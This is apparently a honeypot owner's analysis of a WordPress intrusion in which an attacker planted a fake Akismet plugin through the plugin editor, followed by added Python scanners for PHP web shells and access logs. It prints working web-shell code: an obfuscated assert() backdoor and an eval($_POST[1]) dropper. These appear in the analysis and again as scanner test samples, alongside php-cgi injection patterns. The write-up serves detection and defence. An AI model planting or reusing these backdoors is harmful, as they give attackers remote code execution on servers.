Broken Akismet plugin replacement with backdoor.
91.200.12.9 reverse-resolves to the name free.ds, and free.ds itself has no DNS records (it does not resolve forward to anything).
whois
information related to '91.200.12.0/22AS43765'
organisation: ORG-PS152-RIPE
org-name: PP SKS-LUGAN
org-type: LIR
address: Lenina
address: 93400
address: Sev
address: UKRAINE
phone: +380665258035
fax-no: +380665258035
admin-c: TAU-RIPE
abuse-c: AR17440-RIPE
mnt-ref: RIPE-NCC-HM-MNT
mnt-ref: LUGAN-MNT
mnt-by: RIPE-NCC-HM-MNT
mnt-by: LUGAN-MNT
created: 2013-09-25T08:41:49Z
last-modified: 2016-07-11T07:26:07Z
source: RIPE # Filtered
p0f3 says the IP address runs "Windows 7 or 8" (passive TCP SYN fingerprint; dist=12 is the estimated hop count):
[2018/02/28 20:51:28] mod=syn|cli=91.200.12.9/54499|srv=162.246.45.144/80|subj=cli|os=Windows 7 or 8|dist=12|params=fuzzy|raw_sig=4:116+12:0:1460:8192,8:mss,nop,ws,nop,nop,sok:df,id+,ecn:0
91.200.12.9 sent the backdoor and the Akismet replacement through the WordPress Plugin Editor's "update" action (wp-admin/plugin-editor.php). That editor lets a logged-in administrator replace the entire contents of a plugin file with whatever arrives in a single HTTP POST parameter (newcontent), so once a login succeeds, planting arbitrary PHP under wp-content/plugins takes one request per file.
91.200.12.9 did this after my honey pot decided to allow a login attempt. The honey pot does this for some small percentage of attempts. 91.200.12.9 got lucky: it only took 20 attempts to get a "valid" login.
- Hand-edit [email protected] to get akismet.php and backdoor.php
- Pretty-print akismet.php to get f1.php
Whoever formatted the Akismet "update" did an extremely poor job: all the Akismet code got commented out, so the "plugin" does nothing but carry the backdoor. The Akismet code uploaded is version 2.5.9; the current version as of 2018-03-05 is 4.0.3.
There are only six lines of PHP in the backdoor:
<?php
if(isset($_POST['1w#'])){
$item['ersxf2d'] = strrev('t'./*-/*-*/'r'./*-/*-*/'es'./*-/*-*/'sa');
$array[] = $item;
/*yD4kpPnRwvSTeGH*/
$array[0]['ersxf2d']($_POST['1w#']);exit();}
PHP code arrives in an HTTP POST variable named 1w# (URL-encoded as 1w%23 in the request body). Some mild obfuscation does not prevent us from seeing what happens: the empty block comments are noise, strrev('t'.'r'.'es'.'sa') is the string "assert", and that name is then used as a variable function, so assert() gets called on the POST data to execute it. As of PHP 7.2, passing a string to assert() is deprecated (it still executes, but raises E_DEPRECATED); PHP 8.0 stopped evaluating string arguments to assert() entirely. I guess blogs that get updated regularly aren't the intended target of this garbage malware.
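As an added example (not the honey pot's tooling, and not WordPress or Akismet code), here is a small Python triage script for the pattern above: it strips the block-comment padding, folds strrev() over string literals back into the sink name, and reports any call that passes a request superglobal into an execution sink, either directly or through a variable function name. The three sample PHP files are constructed inline; two of them are the snippets quoted on this page (the six-line Akismet backdoor, and the eval($_POST[1]) one-liner from the webconfig.txt.php dropper described further down), the third is a benign control.

```python
"""Syntactic triage of PHP files for the web-shell shape seen in the Akismet
"update": request input ($_POST/$_GET/$_REQUEST/$_COOKIE) passed straight
into an execution sink (assert, eval, system, ...), with the sink name
optionally hidden as strrev() over concatenated string literals.

Added example, not code from the honey pot or from WordPress/Akismet.
SAMPLES is constructed inline; the first two entries are the snippets
quoted on the page, the third is benign.
"""
import re

SINKS = ("assert", "eval", "system", "passthru", "shell_exec", "exec",
         "popen", "proc_open", "create_function")
BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.S)
# strrev('t'.'r'.'es'.'sa') once the comments are gone: single-quoted
# literals joined by '.'
STRREV = re.compile(r"strrev\(\s*('[^']*'(?:\s*\.\s*'[^']*')*)\s*\)")
SUPERGLOBAL = re.compile(
    r"""\$_(POST|GET|REQUEST|COOKIE)\s*\[\s*(?:(['"])(.*?)\2|([^\]]+))\s*\]""")
# a direct call to a known sink, or a call through a variable such as
# $f(...) or $array[0]['ersxf2d'](...)
CALL = re.compile(r"(?:\b(" + "|".join(SINKS) + r")|(\$\w+(?:\s*\[[^\]]*\])*))\s*\(")

SAMPLES = {
    "akismet/backdoor.php": r"""<?php
if(isset($_POST['1w#'])){
$item['ersxf2d'] = strrev('t'./*-/*-*/'r'./*-/*-*/'es'./*-/*-*/'sa');
$array[] = $item;
/*yD4kpPnRwvSTeGH*/
$array[0]['ersxf2d']($_POST['1w#']);exit();}
""",
    "webconfig.txt.php": "<?php eval($_POST[1]);?>",
    "benign.php": r"""<?php
$q = sanitize_text_field($_GET['q']);
echo esc_html($q);
""",
}


def deobfuscate(src):
    """Drop block comments and fold strrev('a'.'b'...) of literals into one literal."""
    src = BLOCK_COMMENT.sub("", src)

    def fold(m):
        pieces = re.findall(r"'([^']*)'", m.group(1))
        return "'" + "".join(pieces)[::-1] + "'"

    return STRREV.sub(fold, src)


def call_args(src, open_idx):
    """Text between the '(' at open_idx and its matching ')'."""
    depth = 0
    for i in range(open_idx, len(src)):
        if src[i] == "(":
            depth += 1
        elif src[i] == ")":
            depth -= 1
            if depth == 0:
                return src[open_idx + 1:i]
    return src[open_idx + 1:]


def scan(src):
    """Findings for calls whose arguments carry request input into a sink."""
    clean = deobfuscate(src)
    # a string literal naming a sink is the tell for a variable-function call
    named = {s for s in SINKS if re.search(r"['\"]" + s + r"['\"]", clean)}
    findings = []
    for m in CALL.finditer(clean):
        direct, via_var = m.group(1), m.group(2)
        g = SUPERGLOBAL.search(call_args(clean, m.end() - 1))
        if not g or (via_var and not named):
            continue
        param = g.group(3) if g.group(3) is not None else g.group(4).strip()
        findings.append({"sink": direct or ",".join(sorted(named)),
                         "source": "$_" + g.group(1), "param": param,
                         "obfuscated": via_var is not None})
    return findings


def triage(files):
    """Map file name -> findings, omitting files with none."""
    return {name: scan(src) for name, src in files.items() if scan(src)}


if __name__ == "__main__":
    for name, hits in triage(SAMPLES).items():
        for h in hits:
            print(f"{name}: {h['source']}['{h['param']}'] -> {h['sink']}"
                  f"{' (via variable function)' if h['obfuscated'] else ''}")
```

The check is purely syntactic: it does not follow assignments, so $x = $_POST['c']; $f = 'assert'; $f($x); would be missed, and a sink literal anywhere in the file is enough to count a variable-function call as suspicious. It is a triage aid for files pulled off the honey pot, not a substitute for diffing the upload against a real Akismet release.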
91.200.12.9 tried a number of things against my web site from February 25 to March 3, 2018. See access_log for an Apache web server "combined" format list of the accesses.
Several of the accesses appear to use some kind of bug, maybe the "PHP interpreter run as CGI-BIN" bug of a few years ago (the 2012 php-cgi query-string argument injection, CVE-2012-1823, in which a query string containing no '=' is handed to php-cgi as command-line options). These accesses seem to create a file webconfig.txt.php that has a single line of PHP in it: <?php eval($_POST[1]);?>

webconfig.txt.php appears in a number of HTTP accesses of the web site hosting my WordPress honey pot. But all of the previous accesses (dating back to 2016-06-10) are either attempts to create the same webconfig.txt.php, or calls to what is apparently another backdoor, one that uses HTTP GET parameters named 'z3' and 'z4'.
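As an added example (not the honey pot's own tooling), here is a Python triage pass over an Apache "combined" format log for the request patterns described on this page: login POSTs to wp-login.php (the guessing phase), POSTs to wp-admin/plugin-editor.php (the plugin rewrite), php-cgi style option injection in the query string, and hits on webconfig.txt.php or on the z3/z4 backdoor parameters. The log lines are constructed to exercise each rule and are not the real access_log; the IPs other than 91.200.12.9 are documentation addresses.

```python
"""Triage an Apache "combined" access log for the request patterns seen
around the Akismet backdoor upload.

Added example, not the honey pot's tooling.  SAMPLE_LOG is constructed
(timestamps, sizes and the non-attacker IPs are made up) to trip each
rule once; it is not the real access_log.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

SAMPLE_LOG = """\
91.200.12.9 - - [25/Feb/2018:19:02:11 +0000] "POST /wp-login.php HTTP/1.1" 200 3214 "-" "Mozilla/5.0"
91.200.12.9 - - [25/Feb/2018:19:02:13 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
91.200.12.9 - - [25/Feb/2018:19:03:40 +0000] "POST /wp-admin/plugin-editor.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
91.200.12.9 - - [01/Mar/2018:02:10:05 +0000] "POST /index.php?-s HTTP/1.1" 200 51 "-" "Mozilla/5.0"
91.200.12.9 - - [01/Mar/2018:02:10:06 +0000] "POST /webconfig.txt.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jun/2016:09:00:00 +0000] "GET /cache.php?z3=ls&z4=x HTTP/1.1" 404 209 "-" "curl/7.47.0"
198.51.100.4 - - [01/Mar/2018:08:00:00 +0000] "GET /2018/03/some-post/ HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
"""


def parse(line):
    """Fields of one combined-format line, or None if it does not parse."""
    m = COMBINED.match(line)
    return m.groupdict() if m else None


def classify(rec):
    """Rule names a single parsed request trips (empty for ordinary traffic)."""
    tags = []
    url = urlsplit(rec["target"])
    path, qs = url.path, url.query
    if rec["method"] == "POST" and path.endswith("/wp-login.php"):
        tags.append("wp-login-post")            # credential guessing
    if rec["method"] == "POST" and path.endswith("/wp-admin/plugin-editor.php"):
        tags.append("plugin-editor-write")      # whole plugin file replaced
    if path.endswith("/webconfig.txt.php"):
        tags.append("webconfig-backdoor")       # the eval($_POST[1]) dropper
    # php-cgi treats a query string with no unencoded '=' as command-line
    # options, so "?-s" or "?-d ..." is argument injection (CVE-2012-1823)
    if qs and "=" not in qs and qs.startswith("-"):
        tags.append("php-cgi-argv-injection")
    if {"z3", "z4"} & set(parse_qs(qs, keep_blank_values=True)):
        tags.append("z3z4-backdoor")            # the older GET-parameter backdoor
    return tags


def triage(lines):
    """(ip, rule, request) for every suspicious request, in log order."""
    hits = []
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        for tag in classify(rec):
            hits.append((rec["ip"], tag, rec["method"] + " " + rec["target"]))
    return hits


def brute_force_sources(hits, threshold=10):
    """IPs with at least `threshold` login POSTs (the page's attacker needed about 20)."""
    counts = Counter(ip for ip, tag, _ in hits if tag == "wp-login-post")
    return {ip for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    hits = triage(SAMPLE_LOG.splitlines())
    for ip, tag, req in hits:
        print(f"{ip:15} {tag:24} {req}")
    print("brute-force sources:", brute_force_sources(hits, threshold=2))
```

The php-cgi rule is the useful one to keep: the CGI specification only passes the query string to the program as argv when it contains no unencoded '=', which is exactly why those requests look like "?-s" or "?-d+..." rather than normal name=value pairs. The login threshold is a knob; on a honey pot two POSTs from one address is already interesting, on a real site it is not.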